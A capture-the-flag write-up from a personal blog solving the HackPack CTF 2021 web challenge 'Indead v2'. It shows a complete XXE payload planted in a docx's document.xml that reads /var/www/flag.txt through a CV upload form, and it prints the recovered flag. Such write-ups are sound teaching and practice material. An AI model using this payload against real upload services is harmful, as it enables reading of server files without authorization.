szymanski.ninja
About
CTF Writeups
Contact
pl|en

HackPack CTF 2021: Indead v2

Indead v2

Category: web

50 points

Job posting website for security experts, pentesters and hackers. Now you can apply by uploading CV. http://indead-upload-cv.ctf2021.hackpack.club

Hint 1: flag.txt is located in /var/www/

Hint 2: We have new job postings. You might be interested

Solution

It’s a continuation of Indead v1.

web1

This time there’s possibility to check details page and upload CV. The form allows only uploads of docx type of file. And then the content of the document is shown on the page.

cv good

I’ve decided to exploit it with XXE. Created dummy docx file. And as it is ordinary zip archive, I’ve extracted and edited /word/document.xml by adding below payload: 

<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///var/www/flag.txt" >]>

and &xxe; in the body of xml.

The malicious document.xml looks like below after the change:

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///var/www/flag.txt" >]>
<w:document xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/
2006/relationships" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/
2006/main" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/
wordprocessingDrawing" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" xmlns:wpg="http://s
chemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibil
ity/2006" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:w14="http://schemas.mic
rosoft.com/office/word/2010/wordml" mc:Ignorable="w14 wp14"><w:body><w:p><w:pPr><w:pStyle w:val="Normal"/><w:bidi w:val=
"0"/><w:jc w:val="left"/><w:rPr></w:rPr></w:pPr><w:r><w:rPr></w:rPr><w:t>Badum, tssss…. &xxe;</w:t></w:r></w:p><w:sectPr
><w:type w:val="nextPage"/><w:pgSz w:w="12240" w:h="15840"/><w:pgMar w:left="1134" w:right="1134" w:header="0" w:top="11
34" w:footer="0" w:bottom="1134" w:gutter="0"/><w:pgNumType w:fmt="decimal"/><w:formProt w:val="false"/><w:textDirection
 w:val="lrTb"/></w:sectPr></w:body></w:document>

I swapped the original document.xml with mine and attempted to upload the prepared docx CV.

flag

Flag

flag{XML_is_ancestor_0f_every7hing_do_you_agree_?}

Privacy Policy
luc © 2021